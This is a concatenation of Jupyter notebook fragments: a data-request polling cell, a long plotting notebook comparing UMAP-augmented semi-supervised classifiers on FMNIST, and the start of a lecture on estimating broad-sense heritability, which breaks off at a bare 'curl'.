###Markdown WARNING Data request lines are commented out to prevent accidental resubmission when running through the entire notebook quickly. ###Code print(data_request_url) #Data Request Line r = requests.get(data_request_url, params=params, auth=(username, token)) data = r.json() %%time check_complete = data['allURLs'][1] + '/status.txt' for i in range(1800): r = requests.get(check_complete) if r.status_code == requests.codes.ok: print('request completed') break else: time.sleep(1) print(data['allURLs'][0]) ###Output _____no_output_____
notebooks/semisupervised/FMNIST/fmnist-plot-results.ipynb
###Markdown View UMAP results for baseline ###Code import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt from tfumap.paths import FIGURE_DIR, save_fig from tfumap.paths import MODEL_DIR from tfumap.semisupervised_keras import pretrained_networks dataset = "fmnist" datasets = [dataset] aug_types = [ "not_augmented", "umap_euclidean", "umap_learned", "augmented", "umap_augmented_learned", "umap_euclidean_augmented", "umap_over_z" ] dset_sizes = [4, 16, 64, 256, 1024, "full"] results_loc = MODEL_DIR / 'semisupervised-keras' results_df = pd.DataFrame(columns=['dataset', 'labels_per_class', 'augmented', 'timestamp', 'location', 'test_acc', 'dset_size_title']) for dataset in datasets: for aug_type in aug_types: for dset_size in dset_sizes: dset_timestamp = pretrained_networks[dataset][aug_type][dset_size] dset_loc = results_loc / dataset/ str(dset_size) / dset_timestamp loc_list = list(dset_loc.glob('test_loss.npy')) if dset_size == 'full': if aug_type == 'augmented': print(loc_list) print(aug_type) if len(loc_list) == 0: print(aug_type, dset_size, dataset, dset_loc) continue test_loss, test_acc = np.load(loc_list[0]) dset_size_title = str(dset_size) dset_size = str(dset_size) if dset_size is not 'full' else 4096 results_df.loc[len(results_df)] = [ dataset, dset_size, aug_type, dset_timestamp, dset_loc, test_acc, dset_size_title ] results_df pal = sns.color_palette('tab20c',20) sns.palplot(pal) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 5), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, 1-acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title('CIFAR10') ax.set_ylabel('Classification Error') ax.set_xlabel('# Training Examples') color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Accuracy') ax.set_xlabel('# Training Examples', x=0.605) #save_fig(FIGURE_DIR/(dataset + '_umap_euclidean'), save_pdf = True) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, { "mask": results_df.augmented == 'umap_intersection', "color": pal[8], "ls": 'solid', "marker": 'o', "label": "+ UMAP (intersection)" }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." }, { "mask": results_df.augmented == 'umap_augmented_learned', "color": pal[4], "ls": 'dashed', "marker": 'X', "label": "+Aug + UMAP (learned)" }, { "mask": results_df.augmented == 'umap_learned', "color": pal[4], "ls": 'solid', "marker": 'o', "label": "+ UMAP (learned)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) ymin, ymax = ax.get_ylim() ymax = 1 ax.set_ylim([ymin, ymax]) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." }, { "mask": results_df.augmented == 'umap_augmented_learned', "color": pal[4], "ls": 'dashed', "marker": 'X', "label": "+Aug + UMAP (learned)" }, #{ # "mask": results_df.augmented == 'umap_learned', # "color": pal[4], # "ls": 'solid', # "marker": 'o', # "label": "+ UMAP (learned)" #}, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." }, #{ # "mask": results_df.augmented == 'umap_euclidean', # "color": pal[0], # "ls": 'solid', # "marker": 'o', # "label": "+ UMAP (Euclidean)" #}, { "mask": results_df.augmented == 'umap_euclidean_augmented', "color": pal[0], "ls": 'dashed', "marker": 'X', "label": "+ Aug. + UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'augmented', "color": pal[16], "ls": 'dashed', "marker": 'X', "label": "+ Aug." }, { "mask": results_df.augmented == 'umap_euclidean', "color": pal[0], "ls": 'solid', "marker": 'o', "label": "+ UMAP (Euclidean)" }, { "mask": results_df.augmented == 'umap_euclidean_augmented', "color": pal[0], "ls": 'dashed', "marker": 'X', "label": "+ Aug. + UMAP (Euclidean)" }, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) color_list = [ { "mask": results_df.augmented == 'not_augmented', "color": pal[16], "ls": 'solid', "marker": 'o', "label": "Baseline" }, { "mask": results_df.augmented == 'umap_over_z', "color": pal[8], "ls": 'dashed', "marker": 'X', "label": "UMAP (learned z)" }, #{ # "mask": results_df.augmented == 'umap_learned', # "color": pal[4], # "ls": 'solid', # "marker": 'o', # "label": "+ UMAP (learned)" #}, ] alpha = 0.75 linewidth = 2 fig, (ax, ax2) = plt.subplots( 1, 2, figsize=(5, 3), dpi=100, sharey=True, gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05}, ) for li, col_dict in enumerate(color_list): mask = col_dict["mask"] color = col_dict['color'] ls = col_dict['ls'] label = col_dict['label'] marker = col_dict['marker'] subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title != "full"] nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label subset_ds = results_df[mask] subset_ds = subset_ds[subset_ds.dset_size_title == "full"] #display(subset_ds) nex = subset_ds.labels_per_class.values.astype("int") acc = subset_ds.test_acc.values nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025 ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none") ax.plot( [], [], "-" + marker, color=color, linewidth=linewidth, label=label, alpha=alpha, markersize=7, #markerfacecolor="none", ls=ls, ) ax.set_xscale("log") ax.set_xticks([4, 16, 64, 256, 1024]) ax.set_xticklabels([4, 16, 64, 256, 1024]) #ax.set_ylim([0, 1]) ax.spines["right"].set_visible(False) ax.legend() ax.set_xlim([2, 2048]) # ax2.set_xscale('log') ax2.set_xticks([4096]) ax2.set_xticklabels(["full"]) ax2.spines["left"].set_visible(False) ax2.yaxis.tick_right() d = 0.015 # how big to make the diagonal lines in axes coordinates # arguments to pass plot, just so we don't keep repeating them kwargs = dict(transform=ax.transAxes, color="k", clip_on=False) ax.plot((1 - d, 1 + d), (-d, +d), **kwargs) ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) d = 0.015 offset = 5 kwargs.update(transform=ax2.transAxes) # switch to the bottom axes ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs) ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs) ax.minorticks_on() ax.tick_params(axis="y", which="minor", direction="out") if False: ax.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5) ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5) ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5) if False: ax.set_ylim([5e-2, 1]) ax2.set_yscale('log') ax.set_title(dataset.upper(), x=0.605) ax.set_ylabel('Classification Acc.') ax.set_xlabel('# Training Examples', x=0.605) ###Output _____no_output_____
gwas-lecture-master/Lecture-6-BroadSenseHeritability.ipynb
###Markdown Estimating broad-sense Heritability ($H^{2}$) Heritability is the proportion of phenotypic variance that can be attributed to genetic differences among individuals. It is defined as the ratio of genetic to total phenotypic variation in a population:Phenotype (P) = Genotype (G) + Environment (E)The genetic component of phenotypic variance can be separated into additive, dominance, and interaction (G x G) effects. Each of these components of variance contribute to broad-sense heritability:\begin{equation*}H^{2} = \frac{VG}{VP} \end{equation*}or\begin{equation*}H^{2} = \frac{Va + Vd + Vi}{VP} \end{equation*}There are several ways to estimate broad-sense heritability. For those of us that work on inbred lines, we can model the variance due to genetics and the environment using a mixed-effects model, while including the accession-id (also known as the genotype or ecotype in some fields of research) as a random effect. We can then use a trick described in [this paper](https://besjournals.onlinelibrary.wiley.com/doi/10.1111/j.2041-210x.2012.00261.x) and implemented in code described [here](https://jonlefcheck.net/2013/03/13/r2-for-linear-mixed-effects-models/). *** Load the data To investigate broad-sense heritability, let's use [publicly available](http://www.pnas.org/content/112/13/4032) glucosinolate data. The formatted data can be downloaded here:curl 